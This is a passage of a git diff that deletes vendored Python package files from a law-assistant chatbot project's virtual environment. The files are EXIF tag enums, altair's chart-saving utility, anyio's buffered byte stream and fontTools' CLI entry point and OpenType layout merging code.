SubjectDistance = 0x9206 - MeteringMode = 0x9207 - LightSource = 0x9208 - Flash = 0x9209 - FocalLength = 0x920A - Noise = 0x920D - ImageNumber = 0x9211 - SecurityClassification = 0x9212 - ImageHistory = 0x9213 - TIFFEPStandardID = 0x9216 - MakerNote = 0x927C - UserComment = 0x9286 - SubsecTime = 0x9290 - SubsecTimeOriginal = 0x9291 - SubsecTimeDigitized = 0x9292 - AmbientTemperature = 0x9400 - Humidity = 0x9401 - Pressure = 0x9402 - WaterDepth = 0x9403 - Acceleration = 0x9404 - CameraElevationAngle = 0x9405 - XPTitle = 0x9C9B - XPComment = 0x9C9C - XPAuthor = 0x9C9D - XPKeywords = 0x9C9E - XPSubject = 0x9C9F - FlashPixVersion = 0xA000 - ColorSpace = 0xA001 - ExifImageWidth = 0xA002 - ExifImageHeight = 0xA003 - RelatedSoundFile = 0xA004 - ExifInteroperabilityOffset = 0xA005 - FlashEnergy = 0xA20B - SpatialFrequencyResponse 
= 0xA20C - FocalPlaneXResolution = 0xA20E - FocalPlaneYResolution = 0xA20F - FocalPlaneResolutionUnit = 0xA210 - SubjectLocation = 0xA214 - ExposureIndex = 0xA215 - SensingMethod = 0xA217 - FileSource = 0xA300 - SceneType = 0xA301 - CFAPattern = 0xA302 - CustomRendered = 0xA401 - ExposureMode = 0xA402 - WhiteBalance = 0xA403 - DigitalZoomRatio = 0xA404 - FocalLengthIn35mmFilm = 0xA405 - SceneCaptureType = 0xA406 - GainControl = 0xA407 - Contrast = 0xA408 - Saturation = 0xA409 - Sharpness = 0xA40A - DeviceSettingDescription = 0xA40B - SubjectDistanceRange = 0xA40C - ImageUniqueID = 0xA420 - CameraOwnerName = 0xA430 - BodySerialNumber = 0xA431 - LensSpecification = 0xA432 - LensMake = 0xA433 - LensModel = 0xA434 - LensSerialNumber = 0xA435 - CompositeImage = 0xA460 - CompositeImageCount = 0xA461 - CompositeImageExposureTimes = 0xA462 - Gamma = 0xA500 - PrintImageMatching = 0xC4A5 - DNGVersion = 0xC612 - DNGBackwardVersion = 0xC613 - UniqueCameraModel = 0xC614 - LocalizedCameraModel = 0xC615 - CFAPlaneColor = 0xC616 - CFALayout = 0xC617 - LinearizationTable = 0xC618 - BlackLevelRepeatDim = 0xC619 - BlackLevel = 0xC61A - BlackLevelDeltaH = 0xC61B - BlackLevelDeltaV = 0xC61C - WhiteLevel = 0xC61D - DefaultScale = 0xC61E - DefaultCropOrigin = 0xC61F - DefaultCropSize = 0xC620 - ColorMatrix1 = 0xC621 - ColorMatrix2 = 0xC622 - CameraCalibration1 = 0xC623 - CameraCalibration2 = 0xC624 - ReductionMatrix1 = 0xC625 - ReductionMatrix2 = 0xC626 - AnalogBalance = 0xC627 - AsShotNeutral = 0xC628 - AsShotWhiteXY = 0xC629 - BaselineExposure = 0xC62A - BaselineNoise = 0xC62B - BaselineSharpness = 0xC62C - BayerGreenSplit = 0xC62D - LinearResponseLimit = 0xC62E - CameraSerialNumber = 0xC62F - LensInfo = 0xC630 - ChromaBlurRadius = 0xC631 - AntiAliasStrength = 0xC632 - ShadowScale = 0xC633 - DNGPrivateData = 0xC634 - MakerNoteSafety = 0xC635 - CalibrationIlluminant1 = 0xC65A - CalibrationIlluminant2 = 0xC65B - BestQualityScale = 0xC65C - RawDataUniqueID = 0xC65D - OriginalRawFileName = 
0xC68B - OriginalRawFileData = 0xC68C - ActiveArea = 0xC68D - MaskedAreas = 0xC68E - AsShotICCProfile = 0xC68F - AsShotPreProfileMatrix = 0xC690 - CurrentICCProfile = 0xC691 - CurrentPreProfileMatrix = 0xC692 - ColorimetricReference = 0xC6BF - CameraCalibrationSignature = 0xC6F3 - ProfileCalibrationSignature = 0xC6F4 - AsShotProfileName = 0xC6F6 - NoiseReductionApplied = 0xC6F7 - ProfileName = 0xC6F8 - ProfileHueSatMapDims = 0xC6F9 - ProfileHueSatMapData1 = 0xC6FA - ProfileHueSatMapData2 = 0xC6FB - ProfileToneCurve = 0xC6FC - ProfileEmbedPolicy = 0xC6FD - ProfileCopyright = 0xC6FE - ForwardMatrix1 = 0xC714 - ForwardMatrix2 = 0xC715 - PreviewApplicationName = 0xC716 - PreviewApplicationVersion = 0xC717 - PreviewSettingsName = 0xC718 - PreviewSettingsDigest = 0xC719 - PreviewColorSpace = 0xC71A - PreviewDateTime = 0xC71B - RawImageDigest = 0xC71C - OriginalRawFileDigest = 0xC71D - SubTileBlockSize = 0xC71E - RowInterleaveFactor = 0xC71F - ProfileLookTableDims = 0xC725 - ProfileLookTableData = 0xC726 - OpcodeList1 = 0xC740 - OpcodeList2 = 0xC741 - OpcodeList3 = 0xC74E - NoiseProfile = 0xC761 - - -"""Maps EXIF tags to tag names.""" -TAGS = { - **{i.value: i.name for i in Base}, - 0x920C: "SpatialFrequencyResponse", - 0x9214: "SubjectLocation", - 0x9215: "ExposureIndex", - 0x828E: "CFAPattern", - 0x920B: "FlashEnergy", - 0x9216: "TIFF/EPStandardID", -} - - -class GPS(IntEnum): - GPSVersionID = 0 - GPSLatitudeRef = 1 - GPSLatitude = 2 - GPSLongitudeRef = 3 - GPSLongitude = 4 - GPSAltitudeRef = 5 - GPSAltitude = 6 - GPSTimeStamp = 7 - GPSSatellites = 8 - GPSStatus = 9 - GPSMeasureMode = 10 - GPSDOP = 11 - GPSSpeedRef = 12 - GPSSpeed = 13 - GPSTrackRef = 14 - GPSTrack = 15 - GPSImgDirectionRef = 16 - GPSImgDirection = 17 - GPSMapDatum = 18 - GPSDestLatitudeRef = 19 - GPSDestLatitude = 20 - GPSDestLongitudeRef = 21 - GPSDestLongitude = 22 - GPSDestBearingRef = 23 - GPSDestBearing = 24 - GPSDestDistanceRef = 25 - GPSDestDistance = 26 - GPSProcessingMethod = 27 - 
GPSAreaInformation = 28 - GPSDateStamp = 29 - GPSDifferential = 30 - GPSHPositioningError = 31 - - -"""Maps EXIF GPS tags to tag names.""" -GPSTAGS = {i.value: i.name for i in GPS} - - -class Interop(IntEnum): - InteropIndex = 1 - InteropVersion = 2 - RelatedImageFileFormat = 4096 - RelatedImageWidth = 4097 - RleatedImageHeight = 4098 - - -class IFD(IntEnum): - Exif = 34665 - GPSInfo = 34853 - Makernote = 37500 - Interop = 40965 - IFD1 = -1 - - -class LightSource(IntEnum): - Unknown = 0 - Daylight = 1 - Fluorescent = 2 - Tungsten = 3 - Flash = 4 - Fine = 9 - Cloudy = 10 - Shade = 11 - DaylightFluorescent = 12 - DayWhiteFluorescent = 13 - CoolWhiteFluorescent = 14 - WhiteFluorescent = 15 - StandardLightA = 17 - StandardLightB = 18 - StandardLightC = 19 - D55 = 20 - D65 = 21 - D75 = 22 - D50 = 23 - ISO = 24 - Other = 255 diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/utils/save.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/utils/save.py deleted file mode 100644 index 90d36f14bc5ebf5cb1e07cb469191ed21e4b3f4b..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/utils/save.py +++ /dev/null @@ -1,176 +0,0 @@ -import json -import pathlib -import warnings - -from .mimebundle import spec_to_mimebundle -from ..vegalite.v5.data import data_transformers - - -def write_file_or_filename(fp, content, mode="w", encoding=None): - """Write content to fp, whether fp is a string, a pathlib Path or a - file-like object""" - if isinstance(fp, str) or isinstance(fp, pathlib.PurePath): - with open(file=fp, mode=mode, encoding=encoding) as f: - f.write(content) - else: - fp.write(content) - - -def set_inspect_format_argument(format, fp, inline): - """Inspect the format argument in the save function""" - if format is None: - if isinstance(fp, str): - format = fp.split(".")[-1] - elif isinstance(fp, pathlib.PurePath): - format = 
fp.suffix.lstrip(".") - else: - raise ValueError( - "must specify file format: " - "['png', 'svg', 'pdf', 'html', 'json', 'vega']" - ) - - if format != "html" and inline: - warnings.warn("inline argument ignored for non HTML formats.", stacklevel=1) - - return format - - -def set_inspect_mode_argument(mode, embed_options, spec, vegalite_version): - """Inspect the mode argument in the save function""" - if mode is None: - if "mode" in embed_options: - mode = embed_options["mode"] - elif "$schema" in spec: - mode = spec["$schema"].split("/")[-2] - else: - mode = "vega-lite" - - if mode != "vega-lite": - raise ValueError("mode must be 'vega-lite', " "not '{}'".format(mode)) - - if mode == "vega-lite" and vegalite_version is None: - raise ValueError("must specify vega-lite version") - - return mode - - -def save( - chart, - fp, - vega_version, - vegaembed_version, - format=None, - mode=None, - vegalite_version=None, - embed_options=None, - json_kwds=None, - webdriver=None, - scale_factor=1, - engine=None, - inline=False, - **kwargs, -): - """Save a chart to file in a variety of formats - - Supported formats are [json, html, png, svg, pdf] - - Parameters - ---------- - chart : alt.Chart - the chart instance to save - fp : string filename, pathlib.Path or file-like object - file to which to write the chart. - format : string (optional) - the format to write: one of ['json', 'html', 'png', 'svg', 'pdf']. - If not specified, the format will be determined from the filename. - mode : string (optional) - Must be 'vega-lite'. If not specified, then infer the mode from - the '$schema' property of the spec, or the ``opt`` dictionary. - If it's not specified in either of those places, then use 'vega-lite'. 
- vega_version : string (optional) - For html output, the version of vega.js to use - vegalite_version : string (optional) - For html output, the version of vegalite.js to use - vegaembed_version : string (optional) - For html output, the version of vegaembed.js to use - embed_options : dict (optional) - The vegaEmbed options dictionary. Default is {} - (See https://github.com/vega/vega-embed for details) - json_kwds : dict (optional) - Additional keyword arguments are passed to the output method - associated with the specified format. - webdriver : string {'chrome' | 'firefox'} (optional) - Webdriver to use for png or svg output - scale_factor : float (optional) - scale_factor to use to change size/resolution of png or svg output - engine: string {'vl-convert', 'altair_saver'} - the conversion engine to use for 'png', 'svg', and 'pdf' formats - inline: bool (optional) - If False (default), the required JavaScript libraries are loaded - from a CDN location in the resulting html file. - If True, the required JavaScript libraries are inlined into the resulting - html file so that it will work without an internet connection. - The altair_viewer package is required if True. - **kwargs : - additional kwargs passed to spec_to_mimebundle. - """ - if json_kwds is None: - json_kwds = {} - - if embed_options is None: - embed_options = {} - - format = set_inspect_format_argument(format, fp, inline) - - # Temporarily turn off any data transformers so that all data is inlined - # when calling chart.to_dict. This is relevant for vl-convert which cannot access - # local json files which could be created by a json data transformer. 
Furthermore, - # we don't exit the with statement until this function completed due to the issue - # described at https://github.com/vega/vl-convert/issues/31 - with data_transformers.enable("default"), data_transformers.disable_max_rows(): - spec = chart.to_dict() - - mode = set_inspect_mode_argument(mode, embed_options, spec, vegalite_version) - - if format == "json": - json_spec = json.dumps(spec, **json_kwds) - write_file_or_filename(fp, json_spec, mode="w") - elif format == "html": - if inline: - kwargs["template"] = "inline" - mimebundle = spec_to_mimebundle( - spec=spec, - format=format, - mode=mode, - vega_version=vega_version, - vegalite_version=vegalite_version, - vegaembed_version=vegaembed_version, - embed_options=embed_options, - json_kwds=json_kwds, - **kwargs, - ) - write_file_or_filename(fp, mimebundle["text/html"], mode="w") - elif format in ["png", "svg", "pdf", "vega"]: - mimebundle = spec_to_mimebundle( - spec=spec, - format=format, - mode=mode, - vega_version=vega_version, - vegalite_version=vegalite_version, - vegaembed_version=vegaembed_version, - webdriver=webdriver, - scale_factor=scale_factor, - engine=engine, - **kwargs, - ) - if format == "png": - write_file_or_filename(fp, mimebundle["image/png"], mode="wb") - elif format == "pdf": - write_file_or_filename(fp, mimebundle["application/pdf"], mode="wb") - else: - encoding = kwargs.get("encoding", "utf-8") - write_file_or_filename( - fp, mimebundle["image/svg+xml"], mode="w", encoding=encoding - ) - else: - raise ValueError("Unsupported format: '{}'".format(format)) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/anyio/streams/buffered.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/anyio/streams/buffered.py deleted file mode 100644 index 11474c16a988d0e1c50be2637b14438985bcfbc9..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/anyio/streams/buffered.py 
+++ /dev/null @@ -1,118 +0,0 @@ -from __future__ import annotations - -from dataclasses import dataclass, field -from typing import Any, Callable, Mapping - -from .. import ClosedResourceError, DelimiterNotFound, EndOfStream, IncompleteRead -from ..abc import AnyByteReceiveStream, ByteReceiveStream - - -@dataclass(eq=False) -class BufferedByteReceiveStream(ByteReceiveStream): - """ - Wraps any bytes-based receive stream and uses a buffer to provide sophisticated receiving - capabilities in the form of a byte stream. - """ - - receive_stream: AnyByteReceiveStream - _buffer: bytearray = field(init=False, default_factory=bytearray) - _closed: bool = field(init=False, default=False) - - async def aclose(self) -> None: - await self.receive_stream.aclose() - self._closed = True - - @property - def buffer(self) -> bytes: - """The bytes currently in the buffer.""" - return bytes(self._buffer) - - @property - def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: - return self.receive_stream.extra_attributes - - async def receive(self, max_bytes: int = 65536) -> bytes: - if self._closed: - raise ClosedResourceError - - if self._buffer: - chunk = bytes(self._buffer[:max_bytes]) - del self._buffer[:max_bytes] - return chunk - elif isinstance(self.receive_stream, ByteReceiveStream): - return await self.receive_stream.receive(max_bytes) - else: - # With a bytes-oriented object stream, we need to handle any surplus bytes we get from - # the receive() call - chunk = await self.receive_stream.receive() - if len(chunk) > max_bytes: - # Save the surplus bytes in the buffer - self._buffer.extend(chunk[max_bytes:]) - return chunk[:max_bytes] - else: - return chunk - - async def receive_exactly(self, nbytes: int) -> bytes: - """ - Read exactly the given amount of bytes from the stream. 
- - :param nbytes: the number of bytes to read - :return: the bytes read - :raises ~anyio.IncompleteRead: if the stream was closed before the requested - amount of bytes could be read from the stream - - """ - while True: - remaining = nbytes - len(self._buffer) - if remaining <= 0: - retval = self._buffer[:nbytes] - del self._buffer[:nbytes] - return bytes(retval) - - try: - if isinstance(self.receive_stream, ByteReceiveStream): - chunk = await self.receive_stream.receive(remaining) - else: - chunk = await self.receive_stream.receive() - except EndOfStream as exc: - raise IncompleteRead from exc - - self._buffer.extend(chunk) - - async def receive_until(self, delimiter: bytes, max_bytes: int) -> bytes: - """ - Read from the stream until the delimiter is found or max_bytes have been read. - - :param delimiter: the marker to look for in the stream - :param max_bytes: maximum number of bytes that will be read before raising - :exc:`~anyio.DelimiterNotFound` - :return: the bytes read (not including the delimiter) - :raises ~anyio.IncompleteRead: if the stream was closed before the delimiter - was found - :raises ~anyio.DelimiterNotFound: if the delimiter is not found within the - bytes read up to the maximum allowed - - """ - delimiter_size = len(delimiter) - offset = 0 - while True: - # Check if the delimiter can be found in the current buffer - index = self._buffer.find(delimiter, offset) - if index >= 0: - found = self._buffer[:index] - del self._buffer[: index + len(delimiter) :] - return bytes(found) - - # Check if the buffer is already at or over the limit - if len(self._buffer) >= max_bytes: - raise DelimiterNotFound(max_bytes) - - # Read more data into the buffer from the socket - try: - data = await self.receive_stream.receive() - except EndOfStream as exc: - raise IncompleteRead from exc - - # Move the offset forward and add the new data to the buffer - offset = max(len(self._buffer) - delimiter_size + 1, 0) - self._buffer.extend(data) diff --git 
a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/__main__.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/__main__.py deleted file mode 100644 index 7c74ad3c86e54cb7e9939ed2bf96aa59cc6dcd06..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/__main__.py +++ /dev/null @@ -1,35 +0,0 @@ -import sys - - -def main(args=None): - if args is None: - args = sys.argv[1:] - - # TODO Handle library-wide options. Eg.: - # --unicodedata - # --verbose / other logging stuff - - # TODO Allow a way to run arbitrary modules? Useful for setting - # library-wide options and calling another library. Eg.: - # - # $ fonttools --unicodedata=... fontmake ... - # - # This allows for a git-like command where thirdparty commands - # can be added. Should we just try importing the fonttools - # module first and try without if it fails? - - if len(sys.argv) < 2: - sys.argv.append("help") - if sys.argv[1] == "-h" or sys.argv[1] == "--help": - sys.argv[1] = "help" - mod = "fontTools." + sys.argv[1] - sys.argv[1] = sys.argv[0] + " " + sys.argv[1] - del sys.argv[0] - - import runpy - - runpy.run_module(mod, run_name="__main__") - - -if __name__ == "__main__": - sys.exit(main()) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/merge/layout.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/merge/layout.py deleted file mode 100644 index 6b85cd503387291f326e937b36a5739b1de23ef1..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/merge/layout.py +++ /dev/null @@ -1,530 +0,0 @@ -# Copyright 2013 Google, Inc. All Rights Reserved. 
-# -# Google Author(s): Behdad Esfahbod, Roozbeh Pournader - -from fontTools import ttLib -from fontTools.ttLib.tables.DefaultTable import DefaultTable -from fontTools.ttLib.tables import otTables -from fontTools.merge.base import add_method, mergeObjects -from fontTools.merge.util import * -import logging - - -log = logging.getLogger("fontTools.merge") - - -def mergeLookupLists(lst): - # TODO Do smarter merge. - return sumLists(lst) - - -def mergeFeatures(lst): - assert lst - self = otTables.Feature() - self.FeatureParams = None - self.LookupListIndex = mergeLookupLists( - [l.LookupListIndex for l in lst if l.LookupListIndex] - ) - self.LookupCount = len(self.LookupListIndex) - return self - - -def mergeFeatureLists(lst): - d = {} - for l in lst: - for f in l: - tag = f.FeatureTag - if tag not in d: - d[tag] = [] - d[tag].append(f.Feature) - ret = [] - for tag in sorted(d.keys()): - rec = otTables.FeatureRecord() - rec.FeatureTag = tag - rec.Feature = mergeFeatures(d[tag]) - ret.append(rec) - return ret - - -def mergeLangSyses(lst): - assert lst - - # TODO Support merging ReqFeatureIndex - assert all(l.ReqFeatureIndex == 0xFFFF for l in lst) - - self = otTables.LangSys() - self.LookupOrder = None - self.ReqFeatureIndex = 0xFFFF - self.FeatureIndex = mergeFeatureLists( - [l.FeatureIndex for l in lst if l.FeatureIndex] - ) - self.FeatureCount = len(self.FeatureIndex) - return self - - -def mergeScripts(lst): - assert lst - - if len(lst) == 1: - return lst[0] - langSyses = {} - for sr in lst: - for lsr in sr.LangSysRecord: - if lsr.LangSysTag not in langSyses: - langSyses[lsr.LangSysTag] = [] - langSyses[lsr.LangSysTag].append(lsr.LangSys) - lsrecords = [] - for tag, langSys_list in sorted(langSyses.items()): - lsr = otTables.LangSysRecord() - lsr.LangSys = mergeLangSyses(langSys_list) - lsr.LangSysTag = tag - lsrecords.append(lsr) - - self = otTables.Script() - self.LangSysRecord = lsrecords - self.LangSysCount = len(lsrecords) - dfltLangSyses = [s.DefaultLangSys 
for s in lst if s.DefaultLangSys] - if dfltLangSyses: - self.DefaultLangSys = mergeLangSyses(dfltLangSyses) - else: - self.DefaultLangSys = None - return self - - -def mergeScriptRecords(lst): - d = {} - for l in lst: - for s in l: - tag = s.ScriptTag - if tag not in d: - d[tag] = [] - d[tag].append(s.Script) - ret = [] - for tag in sorted(d.keys()): - rec = otTables.ScriptRecord() - rec.ScriptTag = tag - rec.Script = mergeScripts(d[tag]) - ret.append(rec) - return ret - - -otTables.ScriptList.mergeMap = { - "ScriptCount": lambda lst: None, # TODO - "ScriptRecord": mergeScriptRecords, -} -otTables.BaseScriptList.mergeMap = { - "BaseScriptCount": lambda lst: None, # TODO - # TODO: Merge duplicate entries - "BaseScriptRecord": lambda lst: sorted( - sumLists(lst), key=lambda s: s.BaseScriptTag - ), -} - -otTables.FeatureList.mergeMap = { - "FeatureCount": sum, - "FeatureRecord": lambda lst: sorted(sumLists(lst), key=lambda s: s.FeatureTag), -} - -otTables.LookupList.mergeMap = { - "LookupCount": sum, - "Lookup": sumLists, -} - -otTables.Coverage.mergeMap = { - "Format": min, - "glyphs": sumLists, -} - -otTables.ClassDef.mergeMap = { - "Format": min, - "classDefs": sumDicts, -} - -otTables.LigCaretList.mergeMap = { - "Coverage": mergeObjects, - "LigGlyphCount": sum, - "LigGlyph": sumLists, -} - -otTables.AttachList.mergeMap = { - "Coverage": mergeObjects, - "GlyphCount": sum, - "AttachPoint": sumLists, -} - -# XXX Renumber MarkFilterSets of lookups -otTables.MarkGlyphSetsDef.mergeMap = { - "MarkSetTableFormat": equal, - "MarkSetCount": sum, - "Coverage": sumLists, -} - -otTables.Axis.mergeMap = { - "*": mergeObjects, -} - -# XXX Fix BASE table merging -otTables.BaseTagList.mergeMap = { - "BaseTagCount": sum, - "BaselineTag": sumLists, -} - -otTables.GDEF.mergeMap = ( - otTables.GSUB.mergeMap -) = ( - otTables.GPOS.mergeMap -) = otTables.BASE.mergeMap = otTables.JSTF.mergeMap = otTables.MATH.mergeMap = { - "*": mergeObjects, - "Version": max, -} - 
-ttLib.getTableClass("GDEF").mergeMap = ttLib.getTableClass( - "GSUB" -).mergeMap = ttLib.getTableClass("GPOS").mergeMap = ttLib.getTableClass( - "BASE" -).mergeMap = ttLib.getTableClass( - "JSTF" -).mergeMap = ttLib.getTableClass( - "MATH" -).mergeMap = { - "tableTag": onlyExisting(equal), # XXX clean me up - "table": mergeObjects, -} - - -@add_method(ttLib.getTableClass("GSUB")) -def merge(self, m, tables): - assert len(tables) == len(m.duplicateGlyphsPerFont) - for i, (table, dups) in enumerate(zip(tables, m.duplicateGlyphsPerFont)): - if not dups: - continue - if table is None or table is NotImplemented: - log.warning( - "Have non-identical duplicates to resolve for '%s' but no GSUB. Are duplicates intended?: %s", - m.fonts[i]._merger__name, - dups, - ) - continue - - synthFeature = None - synthLookup = None - for script in table.table.ScriptList.ScriptRecord: - if script.ScriptTag == "DFLT": - continue # XXX - for langsys in [script.Script.DefaultLangSys] + [ - l.LangSys for l in script.Script.LangSysRecord - ]: - if langsys is None: - continue # XXX Create! 
- feature = [v for v in langsys.FeatureIndex if v.FeatureTag == "locl"] - assert len(feature) <= 1 - if feature: - feature = feature[0] - else: - if not synthFeature: - synthFeature = otTables.FeatureRecord() - synthFeature.FeatureTag = "locl" - f = synthFeature.Feature = otTables.Feature() - f.FeatureParams = None - f.LookupCount = 0 - f.LookupListIndex = [] - table.table.FeatureList.FeatureRecord.append(synthFeature) - table.table.FeatureList.FeatureCount += 1 - feature = synthFeature - langsys.FeatureIndex.append(feature) - langsys.FeatureIndex.sort(key=lambda v: v.FeatureTag) - - if not synthLookup: - subtable = otTables.SingleSubst() - subtable.mapping = dups - synthLookup = otTables.Lookup() - synthLookup.LookupFlag = 0 - synthLookup.LookupType = 1 - synthLookup.SubTableCount = 1 - synthLookup.SubTable = [subtable] - if table.table.LookupList is None: - # mtiLib uses None as default value for LookupList, - # while feaLib points to an empty array with count 0 - # TODO: make them do the same - table.table.LookupList = otTables.LookupList() - table.table.LookupList.Lookup = [] - table.table.LookupList.LookupCount = 0 - table.table.LookupList.Lookup.append(synthLookup) - table.table.LookupList.LookupCount += 1 - - if feature.Feature.LookupListIndex[:1] != [synthLookup]: - feature.Feature.LookupListIndex[:0] = [synthLookup] - feature.Feature.LookupCount += 1 - - DefaultTable.merge(self, m, tables) - return self - - -@add_method( - otTables.SingleSubst, - otTables.MultipleSubst, - otTables.AlternateSubst, - otTables.LigatureSubst, - otTables.ReverseChainSingleSubst, - otTables.SinglePos, - otTables.PairPos, - otTables.CursivePos, - otTables.MarkBasePos, - otTables.MarkLigPos, - otTables.MarkMarkPos, -) -def mapLookups(self, lookupMap): - pass - - -# Copied and trimmed down from subset.py -@add_method( - otTables.ContextSubst, - otTables.ChainContextSubst, - otTables.ContextPos, - otTables.ChainContextPos, -) -def __merge_classify_context(self): - class 
ContextHelper(object): - def __init__(self, klass, Format): - if klass.__name__.endswith("Subst"): - Typ = "Sub" - Type = "Subst" - else: - Typ = "Pos" - Type = "Pos" - if klass.__name__.startswith("Chain"): - Chain = "Chain" - else: - Chain = "" - ChainTyp = Chain + Typ - - self.Typ = Typ - self.Type = Type - self.Chain = Chain - self.ChainTyp = ChainTyp - - self.LookupRecord = Type + "LookupRecord" - - if Format == 1: - self.Rule = ChainTyp + "Rule" - self.RuleSet = ChainTyp + "RuleSet" - elif Format == 2: - self.Rule = ChainTyp + "ClassRule" - self.RuleSet = ChainTyp + "ClassSet" - - if self.Format not in [1, 2, 3]: - return None # Don't shoot the messenger; let it go - if not hasattr(self.__class__, "_merge__ContextHelpers"): - self.__class__._merge__ContextHelpers = {} - if self.Format not in self.__class__._merge__ContextHelpers: - helper = ContextHelper(self.__class__, self.Format) - self.__class__._merge__ContextHelpers[self.Format] = helper - return self.__class__._merge__ContextHelpers[self.Format] - - -@add_method( - otTables.ContextSubst, - otTables.ChainContextSubst, - otTables.ContextPos, - otTables.ChainContextPos, -) -def mapLookups(self, lookupMap): - c = self.__merge_classify_context() - - if self.Format in [1, 2]: - for rs in getattr(self, c.RuleSet): - if not rs: - continue - for r in getattr(rs, c.Rule): - if not r: - continue - for ll in getattr(r, c.LookupRecord): - if not ll: - continue - ll.LookupListIndex = lookupMap[ll.LookupListIndex] - elif self.Format == 3: - for ll in getattr(self, c.LookupRecord): - if not ll: - continue - ll.LookupListIndex = lookupMap[ll.LookupListIndex] - else: - assert 0, "unknown format: %s" % self.Format - - -@add_method(otTables.ExtensionSubst, otTables.ExtensionPos) -def mapLookups(self, lookupMap): - if self.Format == 1: - self.ExtSubTable.mapLookups(lookupMap) - else: - assert 0, "unknown format: %s" % self.Format - - -@add_method(otTables.Lookup) -def mapLookups(self, lookupMap): - for st in self.SubTable: 
- if not st: - continue - st.mapLookups(lookupMap) - - -@add_method(otTables.LookupList) -def mapLookups(self, lookupMap): - for l in self.Lookup: - if not l: - continue - l.mapLookups(lookupMap) - - -@add_method(otTables.Lookup) -def mapMarkFilteringSets(self, markFilteringSetMap): - if self.LookupFlag & 0x0010: - self.MarkFilteringSet = markFilteringSetMap[self.MarkFilteringSet] - - -@add_method(otTables.LookupList) -def mapMarkFilteringSets(self, markFilteringSetMap): - for l in self.Lookup: - if not l: - continue - l.mapMarkFilteringSets(markFilteringSetMap) - - -@add_method(otTables.Feature) -def mapLookups(self, lookupMap): - self.LookupListIndex = [lookupMap[i] for i in self.LookupListIndex] - - -@add_method(otTables.FeatureList) -def mapLookups(self, lookupMap): - for f in self.FeatureRecord: - if not f or not f.Feature: - continue - f.Feature.mapLookups(lookupMap) - - -@add_method(otTables.DefaultLangSys, otTables.LangSys) -def mapFeatures(self, featureMap): - self.FeatureIndex = [featureMap[i] for i in self.FeatureIndex] - if self.ReqFeatureIndex != 65535: - self.ReqFeatureIndex = featureMap[self.ReqFeatureIndex] - - -@add_method(otTables.Script) -def mapFeatures(self, featureMap): - if self.DefaultLangSys: - self.DefaultLangSys.mapFeatures(featureMap) - for l in self.LangSysRecord: - if not l or not l.LangSys: - continue - l.LangSys.mapFeatures(featureMap) - - -@add_method(otTables.ScriptList) -def mapFeatures(self, featureMap): - for s in self.ScriptRecord: - if not s or not s.Script: - continue - s.Script.mapFeatures(featureMap) - - -def layoutPreMerge(font): - # Map indices to references - - GDEF = font.get("GDEF") - GSUB = font.get("GSUB") - GPOS = font.get("GPOS") - - for t in [GSUB, GPOS]: - if not t: - continue - - if t.table.LookupList: - lookupMap = {i: v for i, v in enumerate(t.table.LookupList.Lookup)} - t.table.LookupList.mapLookups(lookupMap) - t.table.FeatureList.mapLookups(lookupMap) - - if ( - GDEF - and GDEF.table.Version >= 0x00010002 - 
and GDEF.table.MarkGlyphSetsDef - ): - markFilteringSetMap = { - i: v for i, v in enumerate(GDEF.table.MarkGlyphSetsDef.Coverage) - } - t.table.LookupList.mapMarkFilteringSets(markFilteringSetMap) - - if t.table.FeatureList and t.table.ScriptList: - featureMap = {i: v for i, v in enumerate(t.table.FeatureList.FeatureRecord)} - t.table.ScriptList.mapFeatures(featureMap) - - # TODO FeatureParams nameIDs - - -def layoutPostMerge(font): - # Map references back to indices - - GDEF = font.get("GDEF") - GSUB = font.get("GSUB") - GPOS = font.get("GPOS") - - for t in [GSUB, GPOS]: - if not t: - continue - - if t.table.FeatureList and t.table.ScriptList: - # Collect unregistered (new) features. - featureMap = GregariousIdentityDict(t.table.FeatureList.FeatureRecord) - t.table.ScriptList.mapFeatures(featureMap) - - # Record used features. - featureMap = AttendanceRecordingIdentityDict( - t.table.FeatureList.FeatureRecord - ) - t.table.ScriptList.mapFeatures(featureMap) - usedIndices = featureMap.s - - # Remove unused features - t.table.FeatureList.FeatureRecord = [ - f - for i, f in enumerate(t.table.FeatureList.FeatureRecord) - if i in usedIndices - ] - - # Map back to indices. - featureMap = NonhashableDict(t.table.FeatureList.FeatureRecord) - t.table.ScriptList.mapFeatures(featureMap) - - t.table.FeatureList.FeatureCount = len(t.table.FeatureList.FeatureRecord) - - if t.table.LookupList: - # Collect unregistered (new) lookups. - lookupMap = GregariousIdentityDict(t.table.LookupList.Lookup) - t.table.FeatureList.mapLookups(lookupMap) - t.table.LookupList.mapLookups(lookupMap) - - # Record used lookups. - lookupMap = AttendanceRecordingIdentityDict(t.table.LookupList.Lookup) - t.table.FeatureList.mapLookups(lookupMap) - t.table.LookupList.mapLookups(lookupMap) - usedIndices = lookupMap.s - - # Remove unused lookups - t.table.LookupList.Lookup = [ - l for i, l in enumerate(t.table.LookupList.Lookup) if i in usedIndices - ] - - # Map back to indices. 
